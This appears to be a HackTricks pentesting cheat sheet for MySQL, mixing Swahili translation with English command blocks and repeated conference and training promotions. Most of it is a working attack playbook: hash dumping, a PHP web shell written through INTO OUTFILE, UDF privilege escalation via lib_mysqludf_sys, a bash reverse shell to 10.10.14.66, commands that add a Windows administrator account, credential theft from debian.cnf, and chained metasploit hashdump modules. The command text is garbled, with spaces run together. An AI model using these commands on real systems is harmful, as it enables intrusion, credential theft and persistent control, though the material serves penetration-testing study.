RootedCON ni tukio muhimu zaidi la usalama wa mtandao nchini Hispania na moja ya muhimu zaidi barani Ulaya. Ikiwa na lengo la kukuza maarifa ya kiufundi, kongamano hili ni mahali pa kukutana kwa wataalamu wa teknolojia na usalama wa mtandao katika kila taaluma.
Basic Information
MySQL inaweza kueleweka kama Mfumo wa Usimamizi wa Hifadhidata wa Uhusiano wa chanzo wazi (RDBMS) ambao upatikana bure. Inafanya kazi kwa Lugha ya Maswali ya Muundo (SQL), ikiruhusu usimamizi na uendeshaji wa hifadhidata.
Bandari ya kawaida: 3306
3306/tcp open mysql
Connect
Local
mysql-uroot# Connect to root without passwordmysql-uroot-p# A password will be asked (check someone)
showdatabases;use<database>;connect<database>;showtables;describe<table_name>;showcolumnsfrom<table>;selectversion(); #versionselect @@version(); #versionselect user(); #Userselect database(); #database name#Get a shell with the mysql client user\!sh#Basic MySQLiUnionSelect1,2,3,4,group_concat(0x7c,table_name,0x7C) frominformation_schema.tablesUnionSelect1,2,3,4,column_namefrominformation_schema.columnswheretable_name="<TABLE NAME>"#Read & Write## Yo need FILE privilege to read & write to files.select load_file('/var/lib/mysql-files/key.txt'); #Read fileselect 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'#Try to change MySQL root passwordUPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';FLUSH PRIVILEGES;quit;
mysql-uusername-p<manycommands.sql#A file with all the commands you want to executemysql-uroot-h127.0.0.1-e'show databases;'
MySQL Permissions Enumeration
#MysqlSHOW GRANTS [FOR user];SHOW GRANTS;SHOW GRANTS FOR'root'@'localhost';SHOW GRANTS FORCURRENT_USER();# Get users, permissions & hashesSELECT*FROM mysql.user;#From DBselect*from mysql.user where user='root';## Get users with file_privselect user,file_priv from mysql.user where file_priv='Y';## Get users with Super_privselect user,Super_priv from mysql.user where Super_priv='Y';# List functionsSELECT routine_name FROM information_schema.routines WHERE routine_type ='FUNCTION';#@ Functions notfrom sys. dbSELECT routine_name FROM information_schema.routines WHERE routine_type ='FUNCTION'AND routine_schema!='sys';
Kwa kweli, unapojaribu kuchukua data za ndani kwenye jedwalimaudhui ya faili server ya MySQL au MariaDB inaomba mteja aisome na kutuma maudhui. Kisha, ikiwa unaweza kubadilisha mteja wa mysql kuungana na seva yako ya MySQL, unaweza kusoma faili bila mpangilio.
Tafadhali notice kwamba hii ni tabia inayotumika:
(Notice the "local" word)
Kwa sababu bila "local" unaweza kupata:
mysql> loaddatainfile"/etc/passwd"intotabletestFIELDSTERMINATEDBY'\n';ERROR1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
RootedCON ni tukio muhimu zaidi la usalama wa mtandao nchini Hispania na moja ya muhimu zaidi barani Ulaya. Kwa lengo la kukuza maarifa ya kiufundi, kongamano hili ni mahali pa kukutana kwa wataalamu wa teknolojia na usalama wa mtandao katika kila taaluma.
POST
Mysql User
Itakuwa ya kuvutia sana ikiwa mysql inafanya kazi kama root:
Katika usanidi wa huduma za MySQL, mipangilio mbalimbali inatumika kufafanua uendeshaji wake na hatua za usalama:
Mipangilio ya user inatumika kutaja mtumiaji ambaye huduma ya MySQL itatekelezwa chini yake.
password inatumika kuanzisha nenosiri linalohusiana na mtumiaji wa MySQL.
admin_address inaelezea anwani ya IP inayosikiliza kwa muunganisho wa TCP/IP kwenye kiolesura cha mtandao wa usimamizi.
Kigezo cha debug kinaashiria usanidi wa sasa wa urekebishaji, ikiwa ni pamoja na taarifa nyeti ndani ya kumbukumbu.
sql_warnings inasimamia ikiwa nyaraka za taarifa zinaundwa kwa taarifa za INSERT za safu moja wakati tahadhari zinatokea, zikiwa na data nyeti ndani ya kumbukumbu.
Pamoja na secure_file_priv, wigo wa shughuli za kuagiza na kuuza data unakabiliwa ili kuboresha usalama.
Privilege escalation
# Get current user (an all users) privileges and hashesusemysql;selectuser();selectuser,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_privfromuser;# Get users, permissions & credsSELECT*FROMmysql.user;mysql-uroot--password=<PASSWORD>-e"SELECT * FROM mysql.user;"# Create user and give privilegescreateusertestidentifiedby'test';grantSELECT,CREATE,DROP,UPDATE,DELETE,INSERTon*.*tomysqlidentifiedby'mysql'WITHGRANTOPTION;# Get a shell (with your permissions, usefull for sudo/suid privesc)\!sh
Privilege Escalation via library
If the mysql server is running as root (or a different more privileged user) you can make it execute commands. For that, you need to use user defined functions. And to create a user defined you will need a library for the OS that is running mysql.
The malicious library to use can be found inside sqlmap and inside metasploit by doing locate "*lib_mysqludf_sys*". The .so files are linux libraries and the .dll are the Windows ones, choose the one you need.
If you don't have those libraries, you can either look for them, or download this linux C code and compile it inside the linux vulnerable machine:
Sasa kwamba una maktaba, ingia ndani ya Mysql kama mtumiaji mwenye mamlaka (root?) na ufuate hatua zifuatazo:
Linux
# Use a databaseuse mysql;# Create a tabletoload the library andmove it to the plugins dircreatetablenpn(line blob);# Load the binary library inside the table## You might need to change the pathandfilenameinsert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));# Get the plugin_dir pathshow variables like'%plugin%';# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/# dumpin there the libraryselect*from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';# Create a functiontoexecute commandscreatefunctionsys_execreturnsinteger soname 'lib_mysqludf_sys.so';# Execute commandsselect sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');
Windows
# CHech the linux comments for more indicationsUSE mysql;CREATETABLEnpn(line blob);INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));show variables like'%plugin%';SELECT*FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';CREATEFUNCTIONsys_execRETURNSinteger SONAME 'lib_mysqludf_sys_32.dll';SELECT sys_exec("net user npn npn12345678 /add");SELECT sys_exec("net localgroup Administrators npn /add");
Kutolewa kwa akreditif za MySQL kutoka kwa faili
Ndani ya /etc/mysql/debian.cnf unaweza kupata nenosiri la maandiko wazi la mtumiaji debian-sys-maint
cat/etc/mysql/debian.cnf
Unaweza kutumia hizi sifa kuingia kwenye hifadhidata ya mysql.
Ndani ya faili: /var/lib/mysql/mysql/user.MYD unaweza kupata hash zote za watumiaji wa MySQL (wale ambao unaweza kutoa kutoka mysql.user ndani ya hifadhidata).
Protocol_Name: MySql #Protocol Abbreviation if there is one.
Port_Number: 3306 #Comma separated if there is more than one.
Protocol_Description: MySql #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for MySql
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).
https://book.hacktricks.xyz/pentesting/pentesting-mysql
Entry_2:
Name: Nmap
Description: Nmap with MySql Scripts
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306
Entry_3:
Name: MySql
Description: Attempt to connect to mysql server
Command: mysql -h {IP} -u {Username}@localhost
Entry_4:
Name: MySql consolesless mfs enumeration
Description: MySql enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'
RootedCON ni tukio muhimu zaidi la usalama wa mtandao nchini Hispania na moja ya muhimu zaidi barani Ulaya. Kwa lengo la kukuza maarifa ya kiufundi, kongamano hili ni mahali pa kukutana kwa wataalamu wa teknolojia na usalama wa mtandao katika kila taaluma.
HackTricks Training AWS Red Team Expert (ARTE)
HackTricks Training GCP Red Team Expert (GRTE)
